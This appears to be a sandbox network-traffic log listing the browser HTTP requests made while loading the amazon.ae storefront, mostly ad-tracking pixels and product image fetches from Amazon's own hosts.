    Source: global trafficHTTP traffic detected: GET /e/xsp/imp?b=RIvbt4KWdIib_MEoD1J-U6gAAAGRdjK04QMAAAIGAQBvbm9fdHhuX2JpZDIgICBvbm9fdHhuX2ltcDEgICA2QY_d&pj=%7B%22measurementMethod%22%3A%22cod_client%22%7D HTTP/1.1Host: aax-eu.amazon.aeConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /x/px/RIvbt4KWdIib_MEoD1J-U6gAAAGRdjK04QMAAAIGAQBvbm9fdHhuX2JpZDIgICBvbm9fdHhuX2ltcDEgICA2QY_d/atf/%7B%22atf%22:true%7D HTTP/1.1Host: aax-eu.amazon.aeConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /x/px/RIvbt4KWdIib_MEoD1J-U6gAAAGRdjK04QMAAAIGAQBvbm9fdHhuX2JpZDIgICBvbm9fdHhuX2ltcDEgICA2QY_d/v/%7B%22wh%22:907,%22ww%22:1280,%22sx%22:0,%22sy%22:0,%22ah%22:19,%22aw%22:300,%22top%22:519,%22left%22:959.984375,%22v%22:%7B%22p%22:0,%22t%22:0,%22def%22:%22amzn%22%7D,%22ptv%22:1724264921.256,%22ttv%22:1724264921.256%7D HTTP/1.1Host: aax-eu.amazon.aeConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/01/csm/showads.v2.js?category=ad&adstype=-ad-column-&ad_size=-housead- HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://www.amazon.aeSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/41qWHXXnEKL._SR240,220_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/3153Pv75-uS._SR240,220_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/S/apesafeframe/ape/sf/desktop/sf-1.50.f3986821.html HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/61cg-CaC1GL._SX1500_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/31qszhAmmGL._SR240,220_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/31eMENCjajL._SR240,220_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/31ihwTsvbBL._SR240,220_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/41BEfYOD4rL._SR240,220_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/Associates/BTS24_AE_GW_ADIB_DC_758x608_EN._SY304_CB567277961_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/31EO3Wv+aeL._SR240,220_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/31b7GLJLg9L._SR240,220_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/OHL/BTS/QC/Updated/2407GH048_AE_OHL_DQC_Pricepoint_Toys_EN_1x._SY116_CB567104843_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/UAE-hq/2024/img/Apparel/XCM_CUTTLE_1746405_3944619_186x116_1X_ar_AE._SY116_CB567106849_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/UAE-hq/2024/img/Apparel/XCM_CUTTLE_1746405_3944617_186x116_1X_ar_AE._SY116_CB567106849_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /x/px/RIvbt4KWdIib_MEoD1J-U6gAAAGRdjK04QMAAAIGAQBvbm9fdHhuX2JpZDIgICBvbm9fdHhuX2ltcDEgICA2QY_d/v/%7B%22wh%22:907,%22ww%22:1280,%22sx%22:0,%22sy%22:0,%22ah%22:19,%22aw%22:300,%22top%22:519,%22left%22:959.984375,%22v%22:%7B%22p%22:50,%22t%22:1,%22def%22:%22iab%22%7D,%22ptv%22:1724264922.216,%22ttv%22:1724264922.216%7D HTTP/1.1Host: aax-eu.amazon.aeConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/UAE-hq/2024/img/Apparel/XCM_CUTTLE_1746405_3944618_186x116_1X_ar_AE._SY116_CB567106849_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/UAE-hq/2024/img/Consumer_Electronics/XCM_CUTTLE_1742948_3924072_186x116_1X_en_AE._SY116_CB566513340_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/41CGjw1qziL._SR240,220_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/OHL/BTS/QC/Updated/2407GH048_AE_OHL_DQC_Pricepoint_Sports_EN_1x._SY116_CB567104843_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/S/sash/Z8YwjOjqIHxqujG.png HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/S/sash/ydDD9hnRfziI$y7.png HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /x/px/RIvbt4KWdIib_MEoD1J-U6gAAAGRdjK04QMAAAIGAQBvbm9fdHhuX2JpZDIgICBvbm9fdHhuX2ltcDEgICA2QY_d/atf/%7B%22atf%22:true%7D HTTP/1.1Host: aax-eu.amazon.aeConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: session-id=261-8635865-4706955; session-id-time=2082787201l; i18n-prefs=AED; ubid-acbae=260-8031893-3804011
    Source: global trafficHTTP traffic detected: GET /x/px/RIvbt4KWdIib_MEoD1J-U6gAAAGRdjK04QMAAAIGAQBvbm9fdHhuX2JpZDIgICBvbm9fdHhuX2ltcDEgICA2QY_d/v/%7B%22wh%22:907,%22ww%22:1280,%22sx%22:0,%22sy%22:0,%22ah%22:19,%22aw%22:300,%22top%22:519,%22left%22:959.984375,%22v%22:%7B%22p%22:0,%22t%22:0,%22def%22:%22amzn%22%7D,%22ptv%22:1724264921.256,%22ttv%22:1724264921.256%7D HTTP/1.1Host: aax-eu.amazon.aeConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: session-id=261-8635865-4706955; session-id-time=2082787201l; i18n-prefs=AED; ubid-acbae=260-8031893-3804011
    Source: global trafficHTTP traffic detected: GET /images/I/31+hYY59fPL._SR240,220_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/41YtSb5uAGL._SR240,220_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/31zyL4SK5OL._SR240,220_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/UAE-hq/2024/img/Apparel/XCM_CUTTLE_1746405_3944616_186x116_1X_ar_AE._SY116_CB567106849_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/41C83Jg7PlL._SR240,220_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/UAE-hq/2024/img/Consumer_Electronics/XCM_CUTTLE_1742948_3924076_186x116_1X_en_AE._SY116_CB566513340_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/OHL/BTS/QC/Updated/2407GH048_AE_OHL_DQC_Pricepoint_Tools_EN_1x._SY116_CB567104843_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/S/apesafeframe/ape/sf/desktop/sf-1.50.af25278b.js HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/S/apesafeframe/ape/sf/desktop/sf-1.50.af25278b.js HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://images-eu.ssl-images-amazon.com/images/S/apesafeframe/ape/sf/desktop/sf-1.50.f3986821.htmlAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/01/ad-feedback/info_icon_1Xsprite.png HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/OHL/BTS/QC/Updated/2407GH048_AE_OHL_DQC_Pricepoint_Outdoor_EN_1x._SY116_CB567104843_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /e/xsp/imp?b=RIvbt4KWdIib_MEoD1J-U6gAAAGRdjK04QMAAAIGAQBvbm9fdHhuX2JpZDIgICBvbm9fdHhuX2ltcDEgICA2QY_d&pj=%7B%22measurementMethod%22%3A%22cod_client%22%7D HTTP/1.1Host: aax-eu.amazon.aeConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: session-id=261-8635865-4706955; session-id-time=2082787201l; i18n-prefs=AED; ubid-acbae=260-8031893-3804011
    Source: global trafficHTTP traffic detected: GET /images/I/41IU10DZeDL._SR240,220_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/S/sash/-NcRiM84u1IwoUa.gif HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
